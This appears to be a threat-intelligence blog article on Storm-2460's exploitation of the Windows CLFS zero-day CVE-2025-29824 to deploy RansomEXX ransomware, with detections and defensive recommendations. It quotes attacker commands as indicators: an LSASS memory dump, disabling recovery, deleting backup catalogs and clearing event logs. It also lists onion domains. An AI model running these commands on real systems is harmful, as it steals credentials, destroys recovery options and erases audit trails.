Zero-Day Exploitation of CLFS Elevates Ransomware Threat: A Wake-Up Call for Cybersecurity Defenders

A sophisticated wave of ransomware activity has recently shaken multiple sectors globally, exploiting a previously unknown vulnerability in Microsoft’s Common Log File System (CLFS). This zero-day vulnerability tracked as CVE-2025-29824 has been actively leveraged by a threat actor group known as Storm-2460, delivering a powerful reminder of how privilege escalation flaws can turn initial access into a full-blown ransomware outbreak. The attack campaign affected targets in the United States, Venezuela, Spain, and Saudi Arabia, spanning IT, financial, software, and retail industries.

In this report, we break down the exploitation technique, post-compromise behavior, ransomware deployment, and strategic insights offered by Microsoft’s threat intelligence. We also provide 10 essential recommendations for organizations to defend themselves against such advanced threats.

Inside the Exploitation of CVE-2025-29824: A Technical Breakdown

The Vulnerability: CVE-2025-29824

The Common Log File System (CLFS) is a Windows kernel component responsible for managing log files. On April 8, 2025, Microsoft patched a critical elevation of privilege (EoP) vulnerability in the CLFS driver. This zero-day vulnerability allowed attackers with standard user privileges to escalate their access to SYSTEM-level, effectively taking control of the machine.

The issue lies in how the CLFS driver handles log file processing. Storm-2460’s exploit manipulates these operations to overwrite process tokens and gain elevated privileges.

Pre-Exploitation Techniques

Although the initial infection vector remains unconfirmed, forensic data points to a classic tradecraft:

Certutil Abuse: Threat actors used certutil.exe to download malware from compromised legitimate domains.
MSBuild Payload Delivery: The downloaded file was a malicious MSBuild project, which decrypted and executed a custom malware loader using the EnumCalendarInfoA API callback.

This payload turned out to be PipeMagic, a malware strain previously linked to zero-day exploits. First documented by Kaspersky in October 2024, and earlier observed by ESET in 2023, PipeMagic is known for its modular nature and focus on stealthy privilege escalation.

One domain associated with this campaign—aaaaabbbbbbb.eastus.cloudapp.azure[.]com—has since been taken offline.

The Exploit in Action

Once deployed via dllhost.exe, the CLFS zero-day was triggered in-memory, showcasing an advanced attack technique that avoided writing the exploit code to disk. The attack used the NtQuerySystemInformation API to leak kernel addresses—a vital step in bypassing Kernel Address Space Layout Randomization (KASLR).

However, Microsoft had hardened this API in Windows 11 version 24H2, making certain information accessible only to users with SeDebugPrivilege—a safeguard that rendered the exploit ineffective on this version.

Once addresses were leaked, the attacker:

Corrupted memory structures.
Invoked RtlSetAllBits to overwrite the process token with 0xFFFFFFFF, granting full privileges.
Injected a malicious payload into winlogon.exe, a sensitive system process.

A CLFS BLF (Base Log File) was created at the path:

C:\ProgramData\SkyPDF\PDUDrv.blf

This file is a forensic indicator of compromise (IoC) associated with the exploit’s execution.

Post-Exploitation: Credential Dumping & Ransomware Deployment

With SYSTEM-level access secured, the attackers launched Sysinternals’ procdump.exe via another dllhost.exe instance, using the following command:

dllhost.exe -accepteula -r -ma lsass.exe c:\programdata\[random]

This allowed Storm-2460 to dump LSASS memory, extracting credentials for lateral movement and persistence.

Shortly after, ransomware was deployed:

Files were encrypted.
Random file extensions were appended.
A ransom note named !_READ_ME_REXX2_!.txt was dropped.

Microsoft linked the activity to the RansomEXX ransomware family, citing similarities in behavior and the inclusion of known .onion domains:

jbdg4buq6jd7ed3rd6cynqtq5abttuekjnxqrqyvk4xam5i7ld33jvqd.onion
uyhi3ypdkfeymyf5v35pbk3pz7st3zamsbjzf47jiqbcm3zmikpwf3qd.onion

Other indicators included:

Running the ransomware via dllhost.exe --do C:\foobar
Disabling Windows recovery: bcdedit /set {default} recoveryenabled no
Deleting backup catalogs: wbadmin delete catalog -quiet
Clearing event logs: wevtutil cl Application
In one case, spawning notepad.exe as SYSTEM to evade detection.

Victims and Scope of Impact

Known Targets:

USA: IT and real estate sectors
Venezuela: Financial institutions
Spain: A major software development company
Saudi Arabia: Retail operations

While Microsoft has stated the number of targeted organizations is small, the sophistication and strategic geographic dispersion suggest a targeted, financially motivated campaign.

Detection and Threat Intelligence

Microsoft Defender Detection Names:

SilverBasket (Win64/Windows)
MSBuildInlineTaskLoader.C (Script/Windows)
SuspClfsAccess (Win32/Windows)

Defender for Endpoint Alerts:

Suspicious access to LSASS
Potential DLL injection
Ransomware behavior in file system
File backup deletions

Microsoft Sentinel Queries:

BLF file creation detection
LSASS dumping activity
Detection of encrypted files with random extensions

Microsoft recommends Security Copilot and Defender XDR users leverage prebuilt playbooks and analytics to automate detection and response activities associated with this threat.

10 Key Recommendations to Prevent Future Exploitation

Apply Security Updates Promptly: Always prioritize patching critical elevation of privilege vulnerabilities, especially those flagged as zero-day (e.g., CVE-2025-29824).
Upgrade to Hardened OS Versions: Windows 11, version 24H2, includes mitigations (e.g., restricted access to NtQuerySystemInformation) that block current exploit paths.
Enable Cloud-Delivered AV Protection: Real-time cloud intelligence helps defend against new threats before signatures are updated.
Utilize EDR in Block Mode: Even in passive AV environments, Endpoint Detection and Response tools can stop malware post-compromise.
Disable Unused Utilities like Certutil: Block or restrict use of dual-use tools like certutil, PowerShell, or MSBuild where not required.
Harden LSASS Process Protection: Prevent memory dumping by enabling LSASS protection features in Windows and using Credential Guard.
Audit and Monitor DLLhost.exe Activity: Abnormal behavior or parent-child process relationships involving dllhost.exe should raise immediate red flags.
Segment Critical Assets: Use network segmentation and access control lists to limit lateral movement after privilege escalation.
Log Everything, Then Retain It: Enable detailed logging and ensure long-term storage of security logs. Attackers frequently clear logs post-compromise.
Train and Simulate: Conduct regular red team and tabletop exercises simulating zero-day exploitation to test detection and response workflows.

Conclusion

The exploitation of CVE-2025-29824 by Storm-2460 and the subsequent deployment of ransomware underscore the persistent evolution of the cyber threat landscape. From leveraging trusted Windows utilities to exploiting kernel-level flaws and deploying ransomware with surgical precision, the attackers demonstrated technical acumen and operational discipline.

This incident highlights why zero-day vulnerabilities, particularly those allowing privilege escalation, are goldmines for ransomware actors. For defenders, the key takeaway is clear: rapid patching, proactive defense-in-depth, and vigilant monitoring are essential to surviving today’s sophisticated threats.

The cybersecurity community must remain hyper-vigilant—because attackers only need one vulnerability, but defenders must protect them all.

Stay updated with CyberCory for the latest threat intelligence, cybersecurity trends, and actionable insights.